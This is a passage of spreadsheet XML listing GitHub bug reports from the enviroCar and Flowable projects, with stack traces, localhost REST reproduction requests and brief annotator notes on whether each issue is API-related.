    <t>https://giv-car.uni-muenster.de/stable/rest/users/Turbomartin/friendActivities =&gt; com.github.jmkgreen.morphia.utils.Assert$AssertionFailedException: Parameter 'vals' is null. com.github.jmkgreen.morphia.utils.Assert.raiseError(Assert.java:74) com.github.jmkgreen.morphia.utils.Assert.parametersNotNull(Assert.java:136) com.github.jmkgreen.morphia.query.FieldEndImpl.hasAnyOf(FieldEndImpl.java:116) com.github.jmkgreen.morphia.query.FieldEndImpl.in(FieldEndImpl.java:126) com.github.jmkgreen.morphia.query.FieldEndImpl.in(FieldEndImpl.java:10) io.car.server.mongo.dao.MongoActivityDao.getForFriends(MongoActivityDao.java:133) io.car.server.core.Service.getFriendActivities(Service.java:387) io.car.server.rest.resources.FriendsActivitiesResource.statistics(FriendsActivitiesResource.java:56) sun.reflect.GeneratedMethodAccessor180.invoke(Unknown Source) sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) java.lang.reflect.Method.invoke(Method.java:616) com.sun.jersey.spi.container.JavaMethodInvokerFactory$1.invoke(JavaMethodInvokerFactory.java:60) com.sun.jersey.server.impl.model.method.dispatch.AbstractResourceMethodDispatchProvider$TypeOutInvoker._dispatch(AbstractResourceMethodDispatchProvider.java:185) com.sun.jersey.server.impl.model.method.dispatch.ResourceJavaMethodDispatcher.dispatch(ResourceJavaMethodDispatcher.java:75) com.sun.jersey.server.impl.uri.rules.HttpMethodRule.accept(HttpMethodRule.java:302)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com.sun.jersey.server.impl.uri.rules.ResourceClassRule.accept(ResourceClassRule.java:108) com.sun.jersey.server.impl.uri.rules.RightHandPathRule.accept(RightHandPathRule.java:147) com.sun.jersey.server.impl.uri.rules.RootResourceClassesRule.accept(RootResourceClassesRule.java:84) com.sun.jersey.server.impl.application.WebApplicationImpl._handleRequest(WebApplicationImpl.java:1511) com.sun.jersey.server.impl.application.WebApplicationImpl._handleRequest(WebApplicationImpl.java:1442) com.sun.jersey.server.impl.application.WebApplicationImpl.handleRequest(WebApplicationImpl.java:1391) com.sun.jersey.server.impl.application.WebApplicationImpl.handleRequest(WebApplicationImpl.java:1381) com.sun.jersey.spi.container.servlet.WebComponent.service(WebComponent.java:416) com.sun.jersey.spi.container.servlet.ServletContainer.service(ServletContainer.java:538) com.sun.jersey.spi.container.servlet.ServletContainer.service(ServletContainer.java:716) javax.servlet.http.HttpServlet.service(HttpServlet.java:717) com.google.inject.servlet.ServletDefinition.doService(ServletDefinition.java:263) com.google.inject.servlet.ServletDefinition.service(ServletDefinition.java:178) com.google.inject.servlet.ManagedServletPipeline.service(ManagedServletPipeline.java:91) com.google.inject.servlet.FilterChainInvocation.doFilter(FilterChainInvocation.java:62) com.google.inject.servlet.ManagedFilterPipeline.dispatch(ManagedFilterPipeline.java:118) com.google.inject.servlet.GuiceFilter.doFilter(GuiceFilter.java:113) com.thetransactioncompany.cors.CORSFilter.doFilter(CORSFilter.java:205) com.thetransactioncompany.cors.CORSFilter.doFilter(CORSFilter.java:266)</t>
  </si>
  <si>
    <t>https://github.com/enviroCar/enviroCar-server/issues/80</t>
  </si>
  <si>
    <t>Group Permissions</t>
  </si>
  <si>
    <t>It seems like joining groups isn't allowed anymore (even joining groups you created yourself)</t>
  </si>
  <si>
    <t>https://github.com/enviroCar/enviroCar-server/issues/153</t>
  </si>
  <si>
    <t>Track encoding valiation throws error for additional metadata</t>
  </si>
  <si>
    <t>The additional track metadata only made it into track.create.json and not track.json. An exception is thrown and logged on encoding, still the properties are included in the output. add the properties to track.json.</t>
  </si>
  <si>
    <t xml:space="preserve">not sure , did not metion calling any api </t>
  </si>
  <si>
    <t>the patch involves fixing response schema</t>
  </si>
  <si>
    <t>https://github.com/enviroCar/enviroCar-server/issues/178</t>
  </si>
  <si>
    <t>Schema resource redirect loop</t>
  </si>
  <si>
    <t>Every schema of the [schema resource](https://envirocar.org/api/stable/schema) will lead to a redirect loop due to the [content negotiation filter](https://github.com/enviroCar/enviroCar-server/blob/master/rest/src/main/java/org/envirocar/server/rest/URIContentNegotiationFilter.java). The `.json` part is stripped of by the filter and the [resource](https://github.com/enviroCar/enviroCar-server/blob/master/rest/src/main/java/org/envirocar/server/rest/resources/JSONSchemaResource.java#L85) will return a redirect if it is not present. Letting the [resource](https://github.com/enviroCar/enviroCar-server/blob/master/rest/src/main/java/org/envirocar/server/rest/resources/JSONSchemaResource.java#L85) just append `.json` at the end of the schema and look it up should solve the problem</t>
  </si>
  <si>
    <t>https://github.com/enviroCar/enviroCar-server/issues/182</t>
  </si>
  <si>
    <t>NullPointerException when trying to export shapefile</t>
  </si>
  <si>
    <t>The URL https://envirocar.org/api/dev/tracks/527a897ee4b08cecc59420d6.shp (shapefile export of track 527a897ee4b08cecc59420d6) returns an exception text containing a NullPointerException. I suspect this is caused by the first feature having less phenomenons than the following.</t>
  </si>
  <si>
    <t>https://github.com/enviroCar/enviroCar-server/issues/183</t>
  </si>
  <si>
    <t>Dates of exported shapefiles don't match the ones in the JSON</t>
  </si>
  <si>
    <t>Presumably some date formating issues.</t>
  </si>
  <si>
    <t>not sure , not specific discription to say it api realted</t>
  </si>
  <si>
    <t xml:space="preserve">the patch involves fixing date format in rest src code </t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/133</t>
  </si>
  <si>
    <t>Inconsistent Handling of IdentityLinks for tasks</t>
  </si>
  <si>
    <t>**Scenario** When a user is involved in a task an "IdentityLink" is created and it points to the TaskEntity Identity Links are not handled consistently dough: - "candidate" identity link types are persisted in "ACT_RU_IDENTITYLINK" and point to a task "ACT_RU_TASK" - "assignee" and "owner" identity link types - are persisted in "ACT_RU_IDENTITYLINK" but have **TASK_ID** null - have a "PROC_INSTANCE_ID" value - have the type "participant" (in fact they refer to a process participant rather than a task owner or assignee) - the actual link between a **TaskEntity** and a User/Group is kept in the "ACT_RU_TASK" table in column OWNER_, ASSIGNEE_ - the **TaskService.getIdentityLinksForTask(String)** method executes **GetIdentityLinksForTaskCmd** command which adds the two links manually and appends them two whatever it found in the DB **Problems** - the API is not consistent. **TaskService.getIdentityLinksForTask(String)** and **IdentityLinkEntityManager.findIdentityLinksByTaskId(String)** can return different results (depending if the task has an owner or assignee) - it affects #123 by making it difficult to keep track (count) of task identity links - the Historic Identity Links are incomplete. The updates regarding task assignee and task ownership are not present in ACT_HI_IDENTITYLINK. Only the entries regarding process participation are kept.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/249</t>
  </si>
  <si>
    <t>delete application and delete process fail in flowable-modeler</t>
  </si>
  <si>
    <t xml:space="preserve"> SEVERE: Servlet.service() for servlet [appDispatcher] in context with path [/flowable-modeler] threw exception [Request processing failed; nested exception is org.mybatis.spring.MyBatisSystemException: nested exception is org.apache.ibatis.executor.ExecutorException: No constructor found in org.flowable.app.domain.editor.ModelInformation matching [java.lang.String, java.lang.String, java.lang.Integer]] with root cause org.apache.ibatis.executor.ExecutorException: No constructor found in org.flowable.app.domain.editor.ModelInformation matching [java.lang.String, java.lang.String, java.lang.Integer] at org.apache.ibatis.executor.resultset.DefaultResultSetHandler.createByConstructorSignature(DefaultResultSetHandler.java:650) at org.apache.ibatis.executor.resultset.DefaultResultSetHandler.createResultObject(DefaultResultSetHandler.java:599) at org.apache.ibatis.executor.resultset.DefaultResultSetHandler.createResultObject(DefaultResultSetHandler.java:574) at org.apache.ibatis.executor.resultset.DefaultResultSetHandler.getRowValue(DefaultResultSetHandler.java:379) at org.apache.ibatis.executor.resultset.DefaultResultSetHandler.handleRowValuesForSimpleResultMap(DefaultResultSetHandler.java:338) at org.apache.ibatis.executor.resultset.DefaultResultSetHandler.handleRowValues(DefaultResultSetHandler.java:313) at org.apache.ibatis.executor.resultset.DefaultResultSetHandler.handleResultSet(DefaultResultSetHandler.java:286) at org.apache.ibatis.executor.resultset.DefaultResultSetHandler.handleResultSets(DefaultResultSetHandler.java:183) at org.apache.ibatis.executor.statement.PreparedStatementHandler.query(PreparedStatementHandler.java:64) at org.apache.ibatis.executor.statement.RoutingStatementHandler.query(RoutingStatementHandler.java:79) at org.apache.ibatis.executor.SimpleExecutor.doQuery(SimpleExecutor.java:63) at org.apache.ibatis.executor.BaseExecutor.queryFromDatabase(BaseExecutor.java:324) at org.apache.ibatis.executor.BaseExecutor.query(BaseExecutor.java:156) at org.apache.ibatis.executor.CachingExecutor.query(CachingExecutor.java:109) at org.apache.ibatis.executor.CachingExecutor.query(CachingExecutor.java:83) at org.apache.ibatis.session.defaults.DefaultSqlSession.selectList(DefaultSqlSession.java:148) at org.apache.ibatis.session.defaults.DefaultSqlSession.selectList(DefaultSqlSession.java:141) at sun.reflect.GeneratedMethodAccessor923.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:497) at org.mybatis.spring.SqlSessionTemplate$SqlSessionInterceptor.invoke(SqlSessionTemplate.java:434) at com.sun.proxy.$Proxy238.selectList(Unknown Source) at org.mybatis.spring.SqlSessionTemplate.selectList(SqlSessionTemplate.java:231) at org.flowable.app.repository.editor.ModelRelationRepositoryImpl.findModelInformationByChildModelId(ModelRelationRepositoryImpl.java:52) at org.flowable.app.service.editor.ModelRelationService.findParentModels(ModelRelationService.java:49) at org.flowable.app.service.editor.ModelRelationService$$FastClassBySpringCGLIB$$317a450f.invoke(&lt;generated&gt;) at org.springframework.cglib.proxy.MethodProxy.invoke(MethodProxy.java:204) at org.springframework.aop.framework.CglibAopProxy$CglibMethodInvocation.invokeJoinpoint(CglibAopProxy.java:720) at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:157) at org.springframework.transaction.interceptor.TransactionInterceptor$1.proceedWithInvocation(TransactionInterceptor.java:99) at org.springframework.transaction.interceptor.TransactionAspectSupport.invokeWithinTransaction(TransactionAspectSupport.java:281) at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:96) at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179) at org.springframework.aop.framework.CglibAopProxy$DynamicAdvisedInterceptor.intercept(CglibAopProxy.java:655) at org.flowable.app.service.editor.ModelRelationService$$EnhancerBySpringCGLIB$$ca581901.findParentModels(&lt;generated&gt;) at org.flowable.app.rest.editor.ModelRelationResource.getModelRelations(ModelRelationResource.java:43) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:497) at org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:221) at org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:136)  Thanks</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/268</t>
  </si>
  <si>
    <t>BusinessKey is not set when starting a process instance by message</t>
  </si>
  <si>
    <t>In Flowable-engine 6.0.0 when I start a new process instance by a message then the business key I send in is not set in the process instance. This is both when using the Java API and Rest API. I have attached a small unit test displaying the problem. I Think the problem occurs in org.flowable.engine.impl.cmd.StartProcessInstanceByMessageCmd#execute(CommandContext commandContext). The businessKey is set here but not actually passed on to the ProcessInstanceHelper when the process instance is created. Process instances created using a process definition key set the business key correctly. [BusinessKeyNotSetTest.zip](https://github.com/flowable/flowable-engine/files/799482/BusinessKeyNotSetTest.zip)</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/280</t>
  </si>
  <si>
    <t>includeTaskLocalVariables=true but task local variables are not returned</t>
  </si>
  <si>
    <t>includeTaskLocalVariables=true but task local variables are not returned Here is query URL /flowable-task/process-api/runtime/tasks?includeTaskLocalVariables=true&amp;includeProcessVariables=true Thanks, --MG</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/456</t>
  </si>
  <si>
    <t>Problem when reusing the group of people</t>
  </si>
  <si>
    <t>If there is more than 1 component of the Group of People type, only the second is returned with the reuse of the variable. Example: if to create a current field group (group of people) and another group intended and the Task to fill the 2 fields. When opening the filled form or already reutizar 2 variables from resort in another form, the second field just makes the value of the variables.</t>
  </si>
  <si>
    <t>not sure , did not meation ay api related thing</t>
  </si>
  <si>
    <t>based on the patch</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/510</t>
  </si>
  <si>
    <t>Content REST API in flowable-task does not have a MultipartResolver bean defined</t>
  </si>
  <si>
    <t>I was trying to use the content API to upload a file to the content-engine in the flowable-task app - using `POST /content-service/content-items`. I sent a valid multipart/form-data HTTP request from the browser, however on the server it was not converted to a MultipartResolver in the controller in `org.flowable.rest.content.service.api.content.ContentItemCollectionResource#createContentItem(HttpServletRequest request, HttpServletResponse response)`. Instead the body is treated as JSON and the parsing of it fails. This means I cannot upload a file using this resource. The problem is that the content API does not have a `MultipartResolver` bean defined in the flowable-task Spring context. In the flowable-ui-task-conf the `MultipartResolver` is defined in `BaseDispatcherServletConfiguration` but the `ContentDispatcherServletConfiguration` does not inherit from this. Only the process API `ProcessDispatcherServletConfiguration` does. The Form and DMN APIs also have the same configuration - in `DmnDispatcherServletConfiguration` and `FormDispatcherServletConfiguration` - so can potentially have a similar problem. I have not tested this. A workaround is to add a `MultipartResolver` bean to the Content APIs Spring context in my own code. (by adding on the Component scanned path). I am using flowable-6.1.0.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/575</t>
  </si>
  <si>
    <t>Unable to bind Headers to a Http task</t>
  </si>
  <si>
    <t>Unable to bind the http headers to an Http task with keys that have a : as a value. When we look at the exception stack (detailed below) and check line 264 of the code, it has a check that prevents values of http headers from having a colon in it (Code snippet also included below). HTTP_TASK_REQUEST_HEADERS_INVALID = requestHeaders are invalid Stack: org.flowable.engine.common.api.FlowableException: requestHeaders are invalid at org.flowable.http.impl.HttpActivityBehaviorImpl.setHeaders(HttpActivityBehaviorImpl.java:264) ~[flowable-http-6.1.2.jar:6.1.2] Code from HttpActivityBehaviorImpl protected void setHeaders(final HttpMessage base, final String headers) throws IOException { try (BufferedReader reader = new BufferedReader(new StringReader(headers { String line = reader.readLine(); while (line != null) { String[] header = line.split(":"); if (header.length == 2) { base.addHeader(header[0], header[1]); line = reader.readLine(); } else { throw new FlowableException(HTTP_TASK_REQUEST_HEADERS_INVALID); } } } } Sample Header that we are passing host:localhost:7000 connection:keep-alive content-length:48 postman-token:ffff44c7-e789-ba46-2f5a-8271b4dd7aba cache-control:no-cache origin:chrome-extension://fhbjgbiflinjbdggehcddcbncdddomop user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 content-type:application/json accept:/ accept-encoding:gzip, deflate, br accept-language:en-US,en;q=0.8</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1028</t>
  </si>
  <si>
    <t>Decision Table Editor; using expressions as outcomes</t>
  </si>
  <si>
    <t>There is an issue when using expressions in an output entry with the type string. When transforming editor JSON to DMN model the expression is surrounded with quotes. This causes the expression not being resolved and should be fixed.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1039</t>
  </si>
  <si>
    <t>HttpTask URL not encoded when saved</t>
  </si>
  <si>
    <t>**Description** When using `HTTP Tasks` in the modeler, the `Request URL` is not correctly URL-Encoded when saving the process model. **Problem** This results in errors starting the process (HTTP 500) when there are e.g. not encoded query parameters in the `Request URL`. This can be found in the logs:  org.flowable.engine.common.api.FlowableException: Invalid URL exception occurred  Caused by: java.net.URISyntaxException: Illegal character in query at    **Linked Topics** [Process won't start with HTTP 500 error](https://forum.flowable.org/t/error-starting-new-process-instance-http-500/1956) [Correct URL Encoding for HTTP Task](https://forum.flowable.org/t/http-task-url-encoding/1982)</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1300</t>
  </si>
  <si>
    <t>No mapping found for HTTP request with URI [/flowable-task/cmmn-api/management/jobs/</t>
  </si>
  <si>
    <t>Using Flowable Admin (deployed using Docker Compose), in CMMN part: 1. list executable jobs through the tab `Jobs`, filter `Executable jobs` 2. select a job 3. execute the job using button `Execute job` The following error occurs:  No mapping found for HTTP request with URI [/flowable-task/cmmn-api/management/jobs/&lt;job-id&gt;] in DispatcherServlet with name 'Flowable CMMN Rest API' org.flowable.ui.admin.service.engine.exception.FlowableServiceException: An error occurred while calling Flowable: HTTP/1.1 404 at org.flowable.ui.admin.service.engine.FlowableClientService.executeRequestNoResponseBody(FlowableClientService.java:462) ~[flowable-ui-admin-logic-6.3.1.jar!/:6.3.1] at org.flowable.ui.admin.service.engine.CmmnJobService.executeJob(CmmnJobService.java:88) ~[flowable-ui-admin-logic-6.3.1.jar!/:6.3.1] at org.flowable.ui.admin.rest.client.CmmnJobClientResource.executeCmmnJob(CmmnJobClientResource.java:89) [flowable-ui-admin-rest-6.3.1.jar!/:6.3.1] at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:1.8.0_102] at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[?:1.8.0_102] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_102] at java.lang.reflect.Method.invoke(Method.java:498) ~[?:1.8.0_102] at org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:209) [spring-web-5.0.6.RELEASE.jar!/:5.0.6.RELEASE]  It seems to me that the REST API used to execute an executable job is not the right one. I think it should be `/flowable-task/cmmn-api/cmmn-management/jobs/&lt;job-id&gt;` No error occurs executing a timer job in the same way but using the filter `Timer jobs`.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1437</t>
  </si>
  <si>
    <t>Unsupported variable query operation: EQUALS</t>
  </si>
  <si>
    <t>flowable-rest.war 6.4.0 POST /query/historic-process-instances when the parameters like : { "variables": [ { "name": "applyUserId", "operation": "EQUALS", "value": {}, "type": "string", "variableOperation": "EQUALS" } ] } the respose is : { "message": "Bad request", "exception": "Unsupported variable query operation: EQUALS" }</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1479</t>
  </si>
  <si>
    <t>Tenant Id attribute not returned for REST API /identity/users</t>
  </si>
  <si>
    <t>Created User with tenantId using POST REST API call to localhost:9080/flowable-rest/service/identity/users BODY : { "id": "user2", "firstName": "user", "lastName": "2", "displayName": "user 2", "email": "user2@example.com", "tenantId": "tenant2", "password": "something" } A GET call on localhost:9080/flowable-rest/service/identity/users/user2 doesnot return tenantId Response : { "id": "user2", "firstName": "user", "lastName": "2", "displayName": "user 2", "url": "http://localhost:9080/flowable-rest/service/identity/users/user2", "email": "user2@example.com", "pictureUrl": null } ![image](https://user-images.githubusercontent.com/17848089/50560317-b699e200-0d25-11e9-9139-fed654ac6621.png) As per the swagger documentation, we should get the following { "data": [ { "id": "testuser", "firstName": "Fred", "lastName": "Smith", "displayName": "Fred Smith", "url": "http://localhost:8182/identity/users/testuser", "email": "no-reply@flowable.org", **"tenantId": "companyTenantId",** "pictureUrl": "http://localhost:8182/identity/users/testuser/picture", "password": "string" } ], "total": 0, "start": 0, "sort": "string", "order": "string", "size": 0 }</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1511</t>
  </si>
  <si>
    <t>Tenant id not returned</t>
  </si>
  <si>
    <t>Hi, When using Flowables REST API, if you specify either includeProcessVariables or includeTaskLocalVariables when querying for tasks, the response does not contain the tenant that is associated with that task, it always contains an empty string If you omit those query params (or set them to false), it works fine: the tenant is correctly set. This happens for both GET /runtime/tasks and POST /query/tasks. After some digging, I found that the SQL queries that are fired against the database are different when you want to include variables. It looks like one of them (for example, selectTasksWithRelatedEntitiesByQueryCriteria) is not including the tenant column. Is this an expected behavior? David Lamas.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1532</t>
  </si>
  <si>
    <t>Flowable IDM: No longer working with external LDAP after update from 6.4.0 to 6.4.1</t>
  </si>
  <si>
    <t>We use `flowable-ui-idm-app` configured to connect to an external LDAP provider. After updating from `6.4.0` to `6.4.1` all logins fail with `"status":500, "error":"Internal Server Error", "message":"There is no PasswordEncoder mapped for the id "null"", "path":"/flowable-idm/app/authentication"`. I guess this is a side effect of https://github.com/flowable/flowable-engine/commit/248de5aec346df61be4ccec603dfa58b5a97f6ae (Cleanup Flowable Spring Boot Security Auto configuration). I tried setting `flowable.idm.password-encoder` to `spring_delegating_noop` (or other values), but this property is not used if `flowable.idm.ldap.enabled` is `true`. see: https://github.com/flowable/flowable-engine/blob/eeebfd23af3571741b60e3f663f17c0ecc50a812/modules/flowable-ui-idm/flowable-ui-idm-conf/src/main/java/org/flowable/ui/idm/conf/SecurityConfiguration.java#L79 **Edit:** https://github.com/flowable/flowable-engine/commit/248de5aec346df61be4ccec603dfa58b5a97f6ae really seems to be the cause. I build `flowable-ui-idm-app` version `6.4.1` but replaced the `flowable-spring-boot-autoconfigure` dependency with version `6.4.0` and the error disappeared.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1626</t>
  </si>
  <si>
    <t>Flowable Admin: Terminate BPMN Process Instance does no longer work in 6.4.1</t>
  </si>
  <si>
    <t>Using flowable-admin `6.4.1` it is not longer possible to terminate a running BPMN Process Instance. (It was working in previous versions as far as I remember.) On the http://localhost:8080/flowable-admin/#/process-instance/$PROCESS_INSTANCE_ID screen I click on the "Terminate process instance" action. In the pop-up I click on "Terminate process instance". The pop-up closes but the instance is still running. If I open Firefox developer tools, I see that the following request (exported in curl format) is send:  curl http://localhost:8080/flowable-admin/app/rest/admin/process-instances/71edd854-34f7-11e9-9a21-d481d7bb0f15" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept: application/json, text/plain, */*" -H "Accept-Language: de,en-US;q=0.7,en;q=0.3" --compressed -H "Referer: http://localhost:8080/flowable-admin/" -H "Content-Type: application/json;charset=utf-8" -H "Connection: keep-alive" -H "Cookie: JSESSIONID=292D3D529731CB1CD1169EE960A978E5; FLOWABLE_REMEMBER_ME=TGJVcGNSQlhZQzVXRThXc3J1UEN3QSUzRCUzRDpyVDFRQVVzaWtNSGJSeGRTVFRyVXR3JTNEJTNE" -H "DNT: 1" --data "{}"  and that a HTTP 400 error with the following body is retured: `{"message":"Action is missing in the request body or the given action is not supported.","messageKey":"GENERAL.ERROR.BAD-REQUEST"}` Looking into the `flowable-admin` code I noticed that the problem is the empty JSON Body send in the POST request. If I replay the request with the correct body `{"action":"terminate"}` the instance is terminated.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1638</t>
  </si>
  <si>
    <t>NullPointerException when saving response as JSON but the response returns no body</t>
  </si>
  <si>
    <t>When in the Flowable Modeler the field "Save response as JSON" is set to true and the response has no body content (e.g. with the DELETE request method), a NullPointerException is thrown:  Caused by: java.lang.NullPointerException at com.fasterxml.jackson.core.JsonFactory.createParser(JsonFactory.java:889) ~[jackson-core-2.9.8.jar:2.9.8] at com.fasterxml.jackson.databind.ObjectMapper.readTree(ObjectMapper.java:2551) ~[jackson-databind-2.9.8.jar:2.9.8] at org.flowable.http.HttpActivityExecutor.execute(HttpActivityExecutor.java:117) ~[flowable-http-6.4.1.jar:6.4.1]  136 more  The error refers to [HttpActivityExecutor.java:117](https://github.com/flowable/flowable-engine/blob/fa3b90ac134e66dada89c521aab53681dd7174cf/modules/flowable-http/src/main/java/org/flowable/http/HttpActivityExecutor.java#L117):  Object varValue = request.isSaveResponseAsJson() ? objectMapper.readTree(response.getBody()) : response.getBody();  where `response.getBody()` returns `null` and pass it to `readTree()`.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1878</t>
  </si>
  <si>
    <t>Cannot delete a privilege for a group using REST API</t>
  </si>
  <si>
    <t xml:space="preserve">I tried to delete a privilege for a group using below API and I got a response status of 200 OK, but when I list all groups for a given privilege, the group that is not supposed to be fetched is included on the list. Moreover, I even tried to set a wrong/non-existent groupId and I am expecting it to throw an exception but still I got a response status of 200 OK. `/privileges/{privilegeId}/group/{groupId}` Upon checking the PrivilegeCollectionResource.java, I noticed that it is invoking deleteUserPrivilegeMapping of identityService. Shouldn't it be invoking deleteGroupPrivilegeMapping instead?  @ApiOperation(value = "Deletes a privilege for a group", nickname = "deleteGroupPrivilege", tags = { "Privileges" }) @ApiResponses(value = { @ApiResponse(code = 200, message = "Indicates the group privilege has been deleted") }) @DeleteMapping(value = "/privileges/{privilegeId}/group/{groupId}") public void deleteGroupPrivilege(@PathVariable String privilegeId, @PathVariable String groupId) { Privilege privilege = getPrivilegeById(privilegeId); if (restApiInterceptor != null) { restApiInterceptor.deleteGroupPrivilege(privilege, groupId); } identityService.deleteUserPrivilegeMapping(privilegeId, groupId); } </t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1915</t>
  </si>
  <si>
    <t>Rest API - Error executing an action of a task if it includes a date variable</t>
  </si>
  <si>
    <t>There is an error trying to complete a task using the rest api. **Curl Request:** &gt; curl -s -H "Content-Type: application/json" -d "@data-1.json" -X POST \ &gt; 'http://admin:test@localhost:8080/flowable-rest/service/runtime/tasks/4e056411-cda3-11e9-9dac-0242ac110007' **data-1.json:** &gt; { &gt; "action": "complete", &gt; "formDefinitionId": "c0acd5f6-cd9e-11e9-913a-0242ac110006", &gt; "variables": [ &gt; { &gt; "name": "ciudad", &gt; "type": "string", &gt; "value": "Cali" &gt; }, &gt; { &gt; "name": "fecha", &gt; "type": "date", &gt; "value": "2018-12-21" &gt; }, &gt; { &gt; "name": "cantidad", &gt; "type": "string", &gt; "value": "1" &gt; }, &gt; { &gt; "name": "aprobado", &gt; "type": "string", &gt; "value": "SI" &gt; } &gt; ] &gt; } **Error** &gt; Caused by: java.lang.ClassCastException: class java.util.Date cannot be cast to class java.lang.String (java.util.Date and java.lang.String are in module java.base of loader 'bootstrap') at org.flowable.form.engine.impl.cmd.GetVariablesFromFormSubmissionCmd.transformFormFieldValueToVariableValue(GetVariablesFromFormSubmissionCmd.java:101) ~[flowable-form-engine-6.4.2.1.jar!/:6.4.2.1] **Expected behavior** The task is completed **Additional context** Docker flowable-rest:6.4.2.1 Database: Postgresql</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/1939</t>
  </si>
  <si>
    <t>Inconsistant Variable Query API - Like Ignore Case</t>
  </si>
  <si>
    <t xml:space="preserve">**Describe the bug** The task query provides an inconsistant API for querying for tasks. When querying for process variables the `likeIgnoreCase` option is available, but when querying for task variables it is not. **Expected behavior** The same operations should be available for all variable querying APIs **Code** bash curl -X POST \ http://localhost:8080/process-api/query/tasks \ -H 'Accept: */*' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Cache-Control: no-cache' \ -H 'Connection: keep-alive' \ -H 'Content-Length: 191' \ -H 'Content-Type: application/json' \ -H 'Host: localhost:8080' \ -H 'Postman-Token: 9aa80127-a061-474a-be27-500aa41f355a,f524a54b-cad6-4c26-9b59-7bd46317529c' \ -H 'User-Agent: PostmanRuntime/7.16.3' \ -H 'cache-control: no-cache' \ -d '{ "includeTaskLocalVariables": true, "includeProcessVariables": true, "taskVariables": [ { "name": "var_2", "value": "%Cd", "operation": "likeIgnoreCase" } ] }'  returns  { "message": "Bad request", "exception": "Unsupported variable query operation: LIKE_IGNORE_CASE" } </t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/2223</t>
  </si>
  <si>
    <t>TaskQuery: scope is not available when including variables</t>
  </si>
  <si>
    <t>Hi, I just found out that when calling .includeTaskLocalVariables() or .includeProcessVariables(), the response does not contain any of the scope attributes. It happens when using both ProcessEngine and CmmnEngine. Why does this happen? Example bellow: ![image](https://user-images.githubusercontent.com/8373746/76636323-c07dbe80-6540-11ea-87cb-8840a5b1caf5.png) ![image](https://user-images.githubusercontent.com/8373746/76636346-cbd0ea00-6540-11ea-89f4-de92b9757222.png)</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/2561</t>
  </si>
  <si>
    <t>Flowable email task : Email to should not be mandatory if email cc or email bcc is provided</t>
  </si>
  <si>
    <t>**Describe the bug** We are using flowable email task. We have one of the requirement where we are allowing user to provide only bcc options. How ever flowable is throwing error that email to is mandatory. **Expected behavior** Email to should not b mandatory if Email cc or Email bcc is provided.</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/2584</t>
  </si>
  <si>
    <t>Can not execute 'move' and 'moveToHistoryJob' on BPMN and CMMN job resource</t>
  </si>
  <si>
    <t>**Describe the bug** The JobResource (REST API) for BPMN and CMMN does not allow to execute the 'move' or 'moveToHistoryJob' action anymore **Expected behavior** Dead letter jobs should be movable through the rest api PR follows</t>
  </si>
  <si>
    <t>https://github.com/flowable/flowable-engine/issues/3003</t>
  </si>
  <si>
    <t>Wrong mediaType reported by REST API for forms</t>
  </si>
  <si>
